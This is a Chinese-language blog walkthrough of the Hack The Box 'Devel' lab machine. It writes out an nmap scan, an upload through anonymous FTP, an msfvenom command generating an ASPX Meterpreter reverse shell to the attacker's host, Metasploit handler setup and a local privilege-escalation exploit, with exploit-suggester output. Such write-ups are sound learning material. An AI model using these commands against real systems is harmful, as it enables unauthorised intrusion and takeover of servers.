HTB-Devel

已于 2022-07-01 04:36:17 修改
阅读量308 收藏
点赞数 1
分类专栏: 安全 文章标签: 网络 服务器 linux
于 2022-07-01 04:22:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53142368/article/details/125549871
版权

Devel

第一步:扫描网络

nmap -sV -O -F --version-light 10.10.10.5
在这里插入图片描述
端口21:文件传输协议FTP控制命令,是一个微软的ftpd
端口80:超文本传输协议(HTTP),这是一个iis服务器

第二步:攻击FTP

检查ftp
ftp 10.10.10.5
是可以匿名登录
在这里插入图片描述
尝试写入文件
put flag.html
echo “H0ne” > flag.html
ls -a 可以看到文件
浏览器访问10.10.10.5/flag.html 是可以看到H0ne的

第三步:创建/上传.aspx外壳

使用MSFvenom进行漏洞利用
MSFvenom 是一个有效载荷生成器,
我们需要创建一个反向shell,这是一种目标机器与攻击机器通信的shell,攻击机器有一个监听端口,它接收连接,通过使用代码或命令执行来实现
在这里插入图片描述
反向tcp外壳应该适用于windows,我们将使用meterpreter
Meterpreter 是一种先进的、可动态扩展的有效负载,它使用内存中的DLL 注入阶段,并在运行时通过网络进行扩展。它通过 stager 套接字进行通信并提供全面的客户端 Ruby API。它具有命令历史记录、选项卡补全、通道等功能。

asp Meterpreter 反向TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=8080 -f aspx -o shell.aspx
在这里插入图片描述
-p :使用的有效载荷
-f:输出格式
-o:将有效负载保存到文件中
LHOST:本地主机
LPORT:本地端口
重新连接FTP
put上传本地文件
在这里插入图片描述

第四步:建立反向shell连接

使用metasploit
msfconsole 启动
search windows/meterpreter/reverse_tcp
在这里插入图片描述
use exploit/multi/handler
用这个命令设置有效的负载处理程序
show options
在这里插入图片描述
设置payload
set payload windows/meterpreter/reverse_tcp
在这里插入图片描述
设置LHOST LPORT
在这里插入图片描述

都设置好了 ,然后run
在这里插入图片描述

sysinfo 查看配置信息
在这里插入图片描述
访问文件发现权限不够,这就需要提权

第五步:权限提升

background 回到攻击前
寻找服务器上的漏洞
use post/multi/recon/local_exploit_suggester

meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

exploit ms10_015_kitrap0d,
这是本地提权的exploit。
use exploit/windows/local/ms10_015_kitrap0d
在我退出之前,用 sessions -i查看我的进程 呢些没有结束
在这里插入图片描述

在这里插入图片描述

最后就是寻找flag了 就不演示了

H0ne
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB-Solutions
03-09
HTB-Solutions
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
HTB Devel Metasploit msf提权windows机器入门姿势
weixin_46128614的博客
01-22 282
HTB中Devel算是入门级的简单机器,但是平时Linux的机器做得比较多windows的机器基本没接触过,做一下Devel也算是练习一下windows机器。 在这个靶机中,传马的方式是FTP匿名登录,上传了一个webshell,在实际环境中,上传webshell的方法多种多样,但是后面提权的手段以及msf的操作可以借鉴 nmap -sS -sV -A -T4 10.10.10.5 从nmap...
oscp——HTB——Devel
王嘟嘟的博客
05-19 334
0x00 前言 难度 入门1级 0x01 信息收集 这里可以看到开了21和80 扫一下21,由于我这里有一点问题,所以21得重新扫一下 0x02 21——Webshell 本来以为是通过80扫目录然后搞进去。。。但是最后扫了半天发现扫错了。 发现是通过21搞进去的。可以看到是匿名访问。所以直接使用ftp连接。这里可以看到ftp的目录可能是和web目录一致的 访问test.txt进行测试 这里使用msf生成一个aspx的马,然后直接put上传 msf监听,访问cs.aspx会弹回来一个shell
HTB Devel[Hack The Box HTB靶场]writeup系列3
重新启程
02-01 2649
Retired Machines的第三台机器Devel 目录 0x00 靶机情况 0x01 端口扫描 0x02 ftp服务 0x03 上传payload 0x04 get webshell 0x05 提权 0x00 靶机情况 从靶机的情况来看,难度属于初级,基本上都是选择1、2、3分为主,操作系统是windows 0x01 端口扫描 看看靶机提供了哪些服务: roo...
HTB_Fawn 靶机之 FTP 协议简介
网络安全学习
04-18 1232
🍭 不要焦虑也不要放弃,每天进步一点点 🍭 文章目录FTP 简介如何使用? ps:填空答案已在文中标出 FTP 简介 FTP 文件传输协议( File Transfer Protocol [1] )是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型的第七层, TCP 模型的第四层, 即应用层, 使用 TCP 传输而不是 UDP,它有两个开放端口,一个是控制端口,一般为 21,一个是数据端口,主动模式为 20,也可以由客户端和服务器商议协定,而 sftp [5] 则是相较于 ftp 更为安.
HTB-oscplike-Blue+Devel+Optimum
m0_53302733的博客
04-04 995
HTB-oscplike-Blue+Devel+Optimum Blue easy难度的blue 靶机IP 10.10.10.40 sudo nmap -sS -sV -A -p- --min-rate=5000 -Pn 10.10.10.40 发现又是139,445 然后sudo nmap -p 445 --script smb-vuln* -sV 10.10.10.40 又是永恒之蓝 这样的入门机器放两台干什么 浪费时间 0bec4f79b0fc7d47bc7320e0b22cf579 249bed7e
HTB-AdmirerToo
qq_53142368的博客
07-12 1848
HTB
【Hack The Box】windows练习-- devel
人间体佐菲的博客
10-28 1118
【Hack The Box】windows练习-- devel
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
HTB内容此存储库包含针对HackTheBox挑战,机器和专业实验室的文章。
网络:HTTPS的加密
li209779的博客
05-18 1077
本文是对于https加密的知识总结以上就是我对于HTTPS的知识总结。
使用MPLS解决BGP的路由黑洞(详解)
qq_64302290的博客
05-18 238
我们知道在MPLS中数据的转发不再依靠路由表而是靠标签(注意:标签是在路由的基础上形成的)。所以在BGP中,我们依靠的就是这个特性来解决BGP的路由黑洞。BGP路由黑洞的解释:BGP的路由黑洞其实就是路由层面可达,数据层面不可达。(你可以收到对方的路由,但是不能和对方通讯。
计算机网络
zengkui198513的博客
05-15 334
上面的每一个问题是每一层都必须面对的也都必须要解决的。每一层而且必须要覆盖上面的信息!
服务器遇到攻击怎么办,有哪些安全措施
dexunyun的博客
05-18 564
DDoS攻击对云服务器安全构成了严重威胁,但通过采取合适的防护策略,我们可以有效地降低攻击的影响。选择可靠的云服务提供商、部署DDoS防护服务是保护云服务器免受DDoS攻击的有效措施。德迅云安全提供了多种防护解决方案,可以帮助企业有效防止DDoS攻击,保护云服务器的安全,保障业务稳定。
嵌入式学习
最新发布
qq_46068832的博客
05-19 283
【代码】嵌入式学习。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值